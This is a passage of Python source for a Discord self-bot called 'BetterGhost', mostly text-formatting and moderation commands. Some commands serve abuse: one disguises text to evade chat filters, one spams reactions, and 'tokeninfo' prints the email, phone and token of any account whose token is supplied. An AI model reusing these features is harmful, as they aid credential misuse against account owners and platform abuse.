@BetterGhost.command(name="decodemorse", description="Decode a message in morsecode", usage="decodemorse [message]", aliases=["morsedecode", "unmorse"])
async def decodemorse(ctx, *, message):
text = message.replace(" ", "+")
await ctx.send(requests.get(f"https://ghost.cool/api/fun/decodemorse?text={text}").text)
@BetterGhost.command(name="secret", description="Send all your messages in a secret block.", usage="secret [message]")
async def secret(ctx, *, message):
await ctx.send('||' + message + '||')
@BetterGhost.command(name="secretletters", description="Put all lettes from your message into separate secret blocks", usage="secretletters [message]")
async def secretletters(ctx, *, message):
def split(word):
return list(word)
msg = ""
for letter in split(message):
msg += "||" + letter + "||"
await ctx.send(msg)
@BetterGhost.command(name="bold", description="Send all your messages in bold.", usage="bold [message]")
async def bold(ctx, *, message):
await ctx.send('**' + message + '**')
@BetterGhost.command(name="italic", description="Send all your messages in italics.", usage="italic [message]")
async def italic(ctx, *, message):
await ctx.send('*' + message + '*')
@BetterGhost.command(name="cpp", description="Send all your messages in a C++ code block.", usage="cpp [message]")
async def cpp(ctx, *, message):
await ctx.send(f"""```cpp\n{message}```""")
@BetterGhost.command(name="cs", description="Send all your messages in a C Sharp code block.", usage="cs [message]")
async def cs(ctx, *, message):
await ctx.send(f"""```cs\n{message}```""")
@BetterGhost.command(name="java", description="Send all your messages in a Java code block.", usage="java [message]")
async def java(ctx, *, message):
await ctx.send(f"""```java\n{message}```""")
@BetterGhost.command(name="python", description="Send all your messages in a Python code block.", usage="python [message]")
async def python(ctx, *, message):
await ctx.send(f"""```py\n{message}```""")
@BetterGhost.command(name="js", description="Send all your messages in a JavaScript code block.", usage="js [message]")
async def js(ctx, *, message):
await ctx.send(f"""```js\n{message}```""")
@BetterGhost.command(name="lua", description="Send all your messages in a Lua code block.", usage="lua [message]")
async def lua(ctx, *, message):
await ctx.send(f"""```lua\n{message}```""")
@BetterGhost.command(name="php", description="Send all your messages in a PHP code block.", usage="php [message]")
async def php(ctx, *, message):
await ctx.send(f"""```php\n{message}```""")
@BetterGhost.command(name="html", description="Send all your messages in a HTML code block.", usage="html [message]")
async def html(ctx, *, message):
await ctx.send(f"""```html\n{message}```""")
@BetterGhost.command(name="css", description="Send all your messages in a CSS code block.", usage="css [message]")
async def css(ctx, *, message):
await ctx.send(f"""```css\n{message}```""")
@BetterGhost.command(name="yaml", description="Send all your messages in a YAML code block.", usage="yaml [message]")
async def yaml(ctx, *, message):
await ctx.send(f"""```yaml\n{message}```""")
@BetterGhost.command(name="json", description="Send all your messages in a JSON code block.", usage="json [message]")
async def _json(ctx, *, message):
await ctx.send(f"""```json\n{message}```""")
@BetterGhost.command(name="aesthetic", description="Send your text s p a c e d out.", usage="aesthetic [text]")
async def aesthetic(ctx, *, text):
message = text
msg = ""
for letter in list(message):
msg += " " + letter + " "
await ctx.send(msg)
@BetterGhost.command(name="animate", description="Animate your text.", usage="animate [text]")
async def animate(ctx, *, text):
output = ""
text = list(text)
msg = await ctx.send(text[0])
for letter in text:
output = output + letter + ""
await msg.edit(content=output)
await asyncio.sleep(1)
@BetterGhost.command(name="chatbypass", description="Bypass chat language restrictions.", usage="chatbypass [text]", aliases=["bypasschat"])
async def chatbypass(ctx, *, text):
text = text.lower()
regional_indicators = {
'a': '𝚊',
'b': '𝚋',
'c': '𝚌',
'd': '𝚍',
'e': '𝚎',
'f': '𝚏',
'g': '𝚐',
'h': '𝚑',
'i': '𝚒',
'j': '𝚓',
'k': '𝚔',
'l': '𝚕',
'm': '𝚖',
'n': '𝚗',
'o': '𝚘',
'p': '𝚙',
'q': '𝚚',
'r': '𝚛',
's': '𝚜',
't': '𝚝',
'u': '𝚞',
'v': '𝚟',
'w': '𝚠',
'x': '𝚡',
'y': '𝚢',
'z': '𝚣'
}
output = ""
text = list(text)
for letter in text:
if letter in regional_indicators:
output = output + regional_indicators[letter] + ""
else:
output = output + letter
await ctx.send(output)
@BetterGhost.command(name="regional", description="Replace all letters with emoji.", usage="regional [text]")
async def regional(ctx, *, text):
text = text.lower()
regional_indicators = {
'a': '<:regional_indicator_a:803940414524620800>',
'b': '<:regional_indicator_b:803940414524620800>',
'c': '<:regional_indicator_c:803940414524620800>',
'd': '<:regional_indicator_d:803940414524620800>',
'e': '<:regional_indicator_e:803940414524620800>',
'f': '<:regional_indicator_f:803940414524620800>',
'g': '<:regional_indicator_g:803940414524620800>',
'h': '<:regional_indicator_h:803940414524620800>',
'i': '<:regional_indicator_i:803940414524620800>',
'j': '<:regional_indicator_j:803940414524620800>',
'k': '<:regional_indicator_k:803940414524620800>',
'l': '<:regional_indicator_l:803940414524620800>',
'm': '<:regional_indicator_m:803940414524620800>',
'n': '<:regional_indicator_n:803940414524620800>',
'o': '<:regional_indicator_o:803940414524620800>',
'p': '<:regional_indicator_p:803940414524620800>',
'q': '<:regional_indicator_q:803940414524620800>',
'r': '<:regional_indicator_r:803940414524620800>',
's': '<:regional_indicator_s:803940414524620800>',
't': '<:regional_indicator_t:803940414524620800>',
'u': '<:regional_indicator_u:803940414524620800>',
'v': '<:regional_indicator_v:803940414524620800>',
'w': '<:regional_indicator_w:803940414524620800>',
'x': '<:regional_indicator_x:803940414524620800>',
'y': '<:regional_indicator_y:803940414524620800>',
'z': '<:regional_indicator_z:803940414524620800>'
}
output = ""
text = list(text)
for letter in text:
if letter in regional_indicators:
output = output + regional_indicators[letter] + " "
else:
output = output + letter
await ctx.send(output)
@BetterGhost.command(name="reactspam", description="Spam reactions on X amount of messages.", usage="reactspam [emoji] [messages]", aliases=["spamreactions", "spamreact"])
async def reactspam(ctx, emoji, messages: int):
if __riskmode__:
#channel = BetterGhost.get_channel(ctx.channel.id)
msgs = await ctx.channel.history(limit=messages).flatten()
for msg in msgs:
try:
await msg.add_reaction(emoji)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="uppercase", description="Send your message in uppercase.", usage="uppercase [msg]")
async def uppercase(ctx, *, msg):
string = msg.upper()
await ctx.send(string)
@BetterGhost.command(name="lowercase", description="Send your message in lowercase.", usage="lowercase [msg]")
async def lowercase(ctx, *, msg):
string = msg.lower()
await ctx.send(string)
@BetterGhost.command(name="sentencecase", description="Send your messages in sentence case.", usage="sentencecase [msg]")
async def sentencecase(ctx, *, msg):
sentenceList = msg.split(". ")
sentenceList2 = []
for string in sentenceList:
string = string[:1].upper() + string[1:]
sentenceList2.append(string)
sentence = ". ".join(sentenceList2)
await ctx.send(sentence)
@BetterGhost.command(name="banlist", description="See the server's ban list.", usage="banlist")
async def banlist(ctx):
if ctx.author.guild_permissions.manage_guild:
msg = ""
banlist = await ctx.guild.bans()
for ban in banlist:
#username = user[0].name
msg += f"{ban.user.name}#{ban.user.discriminator} ({ban.user.id})\n"
if __embedmode__:
embed = discord.Embed(title=ctx.guild.name + "'s banned member list", description=msg, color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ {ctx.guild.name}'s banned member list ]
{msg}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@BetterGhost.command(name="ban", description="Ban the mentioned user.", usage="ban [@user]")
async def ban(ctx, *, user: discord.Member):
if ctx.author.guild_permissions.ban_members:
await user.ban()
if __embedmode__:
embed = discord.Embed(title=user.name + " has been banned", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"{user.name} has been banned")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@BetterGhost.command(name="unban", description="Unban the mentioned id.", usage="unban [id]")
async def unban(ctx, *, id: int):
if ctx.author.guild_permissions.ban_members:
user = await BetterGhost.fetch_user(id)
await ctx.guild.unban(user)
if __embedmode__:
embed = discord.Embed(title=user.name + " has been unbanned", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"{user.name} has been unbanned")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@BetterGhost.command(name="kick", description="Kick the mentioned user.", usage="kick [@user]")
async def kick(ctx, user: discord.Member):
if ctx.author.guild_permissions.kick_members:
await user.kick()
if __embedmode__:
embed = discord.Embed(title=user.name + " has been kicked", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"{user.name} has been kicked")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@BetterGhost.command(name="mute", description="Mute the menitioned user.", usage="mute [@user]")
async def mute(ctx, user: discord.Member):
if ctx.author.guild_permissions.mute_members:
if get(ctx.guild.roles, name="Muted"):
mutedrole = get(ctx.guild.roles, name="Muted")
else:
await ctx.guild.create_role(name="Muted")
mutedrole = get(ctx.guild.roles, name="Muted")
for channel in ctx.guild.channels:
if channel.type == "Text":
await channel.set_permissions(mutedrole, send_messages=False)
else:
await channel.set_permissions(mutedrole, send_messages=False, connect=False)
await user.add_roles(mutedrole)
if __embedmode__:
embed = discord.Embed(title=user.name + " has been muted", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"{user.name} has been muted")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@BetterGhost.command(name="unmute", description="Unmute the mentioned user.", usage="unmute [@user]")
async def unmute(ctx, user: discord.Member):
if ctx.author.guild_permissions.mute_members:
mutedrole = get(ctx.guild.roles, name="Muted")
if mutedrole in user.roles:
if __embedmode__:
await user.remove_roles(mutedrole)
embed = discord.Embed(title=user.name + " has been unmuted", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"{user.name} has been unmuted")
else:
if __embedmode__:
embed = discord.Embed(title=user.name + " is not muted", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"{user.name} is not muted")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@BetterGhost.command(name="newrole", description="Create a new role.", usage="newrole [name]", aliases=["createrole"])
async def newrole(ctx, *, name):
if ctx.author.guild_permissions.manage_roles:
await ctx.guild.create_role(name=name)
if __embedmode__:
embed = discord.Embed(title="@" + name + " has been created", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"@{name} has been created")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@BetterGhost.command(name="delrole", description="Delete the mentioned role.", usage="delrole [@role]", aliases=["deleterole"])
async def delrole(ctx, *, role: discord.Role):
if ctx.author.guild_permissions.manage_roles:
await role.delete()
if __embedmode__:
embed = discord.Embed(title="@" + role.name + " has been deleted", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"@{role.name} has been deleted")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@BetterGhost.command(name="purge", description="Purge X amount of messages.", usage="purge [amount]")
async def purge(ctx, amount: int):
if ctx.author.guild_permissions.manage_messages:
history = await ctx.channel.history(limit=amount).flatten()
deletedamount = 0
for message in history:
try:
deletedamount+=1
await message.delete()
await asyncio.sleep(1)
except:
pass
if __embedmode__:
embed = discord.Embed(title=f"Deleted {deletedamount} messages", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"Deleted {deletedamount} messages")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@BetterGhost.command(name="purgeself", description="Purge your messages.", usage="purgeself [amount]")
async def purge(ctx, amount: int):
history = await ctx.channel.history(limit=amount).flatten()
deletedamount = 0
for message in history:
if message.author.id == BetterGhost.user.id:
try:
deletedamount+=1
await message.delete()
await asyncio.sleep(1)
except:
pass
if __embedmode__:
embed = discord.Embed(title=f"Deleted {deletedamount} messages", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"Deleted {deletedamount} messages")
@BetterGhost.command(name="lock", description="Lock the command channel.", usage="lock")
async def lock(ctx):
if ctx.author.guild_permissions.manage_channels:
await ctx.channel.set_permissions(ctx.guild.default_role, read_messages=False)
if __embedmode__:
embed = discord.Embed(title=f"Channel Locked", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Channel Locked")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@BetterGhost.command(name="unlock", description="Unlock the command channel.", usage="unlock")
async def unlock(ctx):
if ctx.author.guild_permissions.manage_channels:
await ctx.channel.set_permissions(ctx.guild.default_role, read_messages=True)
if __embedmode__:
embed = discord.Embed(title=f"Channel Unlocked", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Channel Unlocked")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@BetterGhost.command(name="lockdown", description="Lock the entire server.", usage="lockdown")
async def lockdown(ctx):
if ctx.author.guild_permissions.manage_guild:
for channel in ctx.guild.channels:
await channel.set_permissions(ctx.guild.default_role, read_messages=False)
channel = await ctx.guild.create_text_channel('lockdown-chat')
if __embedmode__:
embed = discord.Embed(title=f"Server Lockdown Enabled!", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await channel.send(embed=embed, delete_after=__deletetimeout__)
else:
await channel.send("Server Lockdown Enabled!")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@BetterGhost.command(name="unlockdown", description="Unlock the entire server.", usage="lockdown")
async def unlockdown(ctx):
if ctx.author.guild_permissions.manage_guild:
for channel in ctx.guild.channels:
await channel.set_permissions(ctx.guild.default_role, read_messages=True)
if __embedmode__:
embed = discord.Embed(title=f"Server Lockdown Disabled!", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Server Lockdown Disabled")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@BetterGhost.command(name="tokeninfo", description="Information about a token.", usage="tokeninfo [token]")
async def tokeninfo(ctx, *, token):
request = requests.get("https://discord.com/api/users/@me", headers={"Authorization": token})
if request.status_code == 200:
request = request.json()
id = request["id"]
username = request["username"]
discriminator = request["discriminator"]
avatar = avatarUrl(id, request["avatar"])
publicflags = request["public_flags"]
bio = request["bio"]
nitro = ""
if "premium_type" in request:
if request["premium_type"] == 0:
nitro = "None"
elif request["premium_type"] == 1:
nitro = "Classic Nitro"
elif request["premium_type"] == 2:
nitro = "Nitro"
else:
nitro = "None"
email = request["email"]
phone = request["phone"]
if bio == "":
bio = " "
if __embedmode__:
embed = discord.Embed(title=user.name + " token information", color=__embedcolour__)
embed.add_field(name="Token", value="```" + str(token) + "```", inline=False)
embed.add_field(name="Username", value="```" + str(username) + "```")
embed.add_field(name="Email", value="```" + str(email) + "```")
embed.add_field(name="Phone", value="```" + str(phone) + "```")
embed.add_field(name="Discriminator", value="```" + str(discriminator) + "```")
embed.add_field(name="User ID", value="```" + str(id) + "```")
embed.add_field(name="Bio", value="```" + str(bio) + "```")
embed.add_field(name="Nitro", value="```" + str(nitro) + "```")
embed.set_thumbnail(url=avatar)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
createdAt = user.created_at.strftime("%d %B, %Y")
await ctx.send(f"""```ini
[ {username}'s token Information ]
Token: {token}
Username: {username}
Email: {email}
Phone: {phone}
Discriminator: {discriminator}
User ID: {id}
Bio: {bio}
Nitro: {nitro}
# {__embedfooter__}```{avatar}""")
else:
await ctx.send("Failed to get information about this token. Probably invalid or from a delete user.")
@BetterGhost.command(name="userinfo", description="Information about the mentioned user.", usage="userinfo [@user]", aliases=["userlookup", "lookupuser"])
async def userinfo(ctx, *, user: discord.User):
if __embedmode__:
embed = discord.Embed(title=user.name + " Information", color=__embedcolour__)
embed.add_field(name="Username", value="```" + str(user.name) + "```")
embed.add_field(name="Discriminator", value="```" + str(user.discriminator) + "```")
embed.add_field(name="User ID", value="```" + str(user.id) + "```")
embed.add_field(name="Created At", value="```" + str(user.created_at.strftime("%d %B, %Y")) + "```")
embed.set_thumbnail(url=avatarUrl(user.id, user.avatar))
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
createdAt = user.created_at.strftime("%d %B, %Y")
await ctx.send(f"""```ini
[ {user.name} Information ]
Username: {user.name}
Discriminator: {user.discriminator}
User ID: {user.id}
Created At: {createdAt}
# {__embedfooter__}```{avatarUrl(user.id, user.avatar)}""")
@BetterGhost.command(name="serverinfo", description="Information about the command server.", usage="serverinfo (guild id)", aliases=["lookupserver", "guildinfo", "lookupguild", "serverlookup", "guildlookup"])
async def serverinfo(ctx, guild:int=None):
if guild == None:
server = ctx.message.guild
else:
server = await BetterGhost.fetch_guild(int(guild))
if __embedmode__:
embed = discord.Embed(title=server.name + " Information", color=__embedcolour__)
embed.add_field(name="Name", value="```" + str(server.name) + "```")
embed.add_field(name="Owner", value="```" + str(server.owner) + "```")
try:
embed.add_field(name="Member Count", value="```" + str(server.member_count) + "```")
except:
pass
embed.add_field(name="Server ID", value="```" + str(server.id) + "```")
embed.add_field(name="Created At", value="```" + str(server.created_at.strftime("%d %B, %Y")) + "```")
embed.set_thumbnail(url=str(server.icon))
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
createdAt = server.created_at.strftime("%d %B, %Y")
try:
await ctx.send(f"""```ini
[ {server.name} Information ]
Name: {server.name}
Owner: {server.owner}
Member Count: {server.member_count}
Server ID: {server.id}
Created At: {createdAt}
# {__embedfooter__}```{str(server.icon)}""")
except:
await ctx.send(f"""```ini
[ {server.name} Information ]
Name: {server.name}
Owner: {server.owner}
Server ID: {server.id}
Created At: {createdAt}
# {__embedfooter__}```{str(server.icon)}""")
@BetterGhost.command(name="avatar", description="Get the mentioned user's avatar.", usage="avatar [@user]", aliases=["pfp", "profilepicture"])
async def avatar(ctx, *, user: discord.User):
if __embedmode__:
embed = discord.Embed(title=user.name + "'s Avatar", color=__embedcolour__)#
embed.set_image(url=avatarUrl(user.id, user.avatar))
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(avatarUrl(user.id, user.avatar))
@BetterGhost.command(name="servericon", description="Get the server's icon.", usage="servericon", aliases=["guildicon"])
async def servericon(ctx):
if __embedmode__:
embed = discord.Embed(title=ctx.guild.name + "'s Icon", color=__embedcolour__)
embed.set_image(url=iconUrl(ctx.guild.id, ctx.guild.icon))
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(iconUrl(ctx.guild.id, ctx.guild.icon))
@BetterGhost.command(name="afkmode", description="Toggle afk mode.", usage="afkmode")
async def afkmode(ctx):
global afkMode
afkMode = not afkMode
cfg = Config.getConfig()
cfg["afkmode"]["enabled"] = afkMode
Config.saveConfig(cfg)
if afkMode:
await ctx.send("Afk mode has been enabled.")
else:
await ctx.send("Afk mode has been disabled.")
@BetterGhost.command(name="settings", description="The bot's settings.", usage="settings")
async def settings(ctx):
totalguilds = len(BetterGhost.guilds)
totalcommands = len(BetterGhost.commands) + len(ccmd)
uptime = int(round(time.time() - botStartTime))
uptimeText = str(timedelta(seconds=uptime))
delta_uptime = datetime.now() - BetterGhost.launch_time
hours, remainder = divmod(int(delta_uptime.total_seconds()), 3600)
minutes, seconds = divmod(remainder, 60)
days, hours = divmod(hours, 24)
logins = open('data/logins.txt', 'r')
logindata = logins.read()
base64_message = logindata
base64_bytes = base64_message.encode('ascii')
message_bytes = base64.b64decode(base64_bytes)
logindata_decoded = message_bytes.decode('ascii')
if __embedmode__:
embed = discord.Embed(title=f"Settings", color=__embedcolour__)
embed.add_field(name="Commands", value=f"```{totalcommands}```")
embed.add_field(name="Logins", value=f"```{logindata_decoded}```")
embed.add_field(name="Version", value=f"```{version}```")
embed.add_field(name="Prefix", value=f"```{BetterGhost.command_prefix}```")
embed.add_field(name="Servers", value=f"```{totalguilds}```")
#embed.add_field(name="Uptime", value=f"```{days}d, {hours}h, {minutes}m, {seconds}s```")
embed.add_field(name="Uptime", value=f"```{uptimeText}```")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Settings ]
Commands: {totalcommands}
Logins: {logindata_decoded}
Version: {version}
Prefix: {BetterGhost.command_prefix}
Servers: {totalguilds}
Uptime: {days}d, {hours}h, {minutes}m, {seconds}s
# {__embedfooter__}```""", delete_after=__deletetimeout__)
'''@BetterGhost.command(name="snipers", description="All snipers.", usage="snipers")
async def snipers(ctx):
if __nitrosniper__ == True:
nitro = "Enabled"
else:
nitro = "Disabled"
if __privnotesniper__ == True:
privnote = "Enabled"
else:
privnote = "Disabled"
if __giveawaysniper__ == True:
giveaway = "Enabled"
else:
giveaway = "Disabled"
try:
embed = discord.Embed(title=f"Snipers", color=__embedcolour__)
embed.add_field(name="Nitro", value=f"```{nitro}```")
embed.add_field(name="Privnote", value=f"```{privnote}```")
embed.add_field(name="Giveaway", value=f"```{giveaway}```")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
except discord.HTTPException:
await ctx.send(f"""```ini
[ Snipers ]
Nitro: {nitro}
Privnote: {privnote}
Giveaway: {giveaway}
# {__embedfooter__}```""", delete_after=__deletetimeout__)'''
@BetterGhost.command(name="playing", description="Set a playing status.", usage="playing [text]")
async def playing(ctx, *, text):
if requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).status_code == 200:
status = requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).json()["status"]
else:
status = "online"
await BetterGhost.change_presence(activity=discord.Game(text), status=discord.Status.try_value(status))
try:
embed = discord.Embed(title=f"Playing Status", description=f"Status changed to: Playing {text}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
except discord.HTTPException:
await ctx.send(f"""```ini
[ Playing Status ]
Status changed to: Playing {text}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="streaming", description="Set a streaming status.", usage="streaming [text]")
async def streaming(ctx, url, *, text):
if requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).status_code == 200:
status = requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).json()["status"]
else:
status = "online"
await BetterGhost.change_presence(activity=discord.Activity(type=1, name=f"{text}", url=f"{url}"), status=discord.Status.try_value(status))
try:
embed = discord.Embed(title=f"Streaming Status", description=f"Status changed to: Streaming {text}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
except discord.HTTPException:
await ctx.send(f"""```ini
[ Streaming Status ]
Status changed to: Streaming {text}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="listening", description="Set a listening to status.", usage="listening [text]")
async def listening(ctx, *, text):
if requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).status_code == 200:
status = requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).json()["status"]
else:
status = "online"
await BetterGhost.change_presence(activity=discord.Activity(type=2, name=f"{text}"), status=discord.Status.try_value(status))
try:
embed = discord.Embed(title=f"Listening Status", description=f"Status changed to: Listening to {text}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
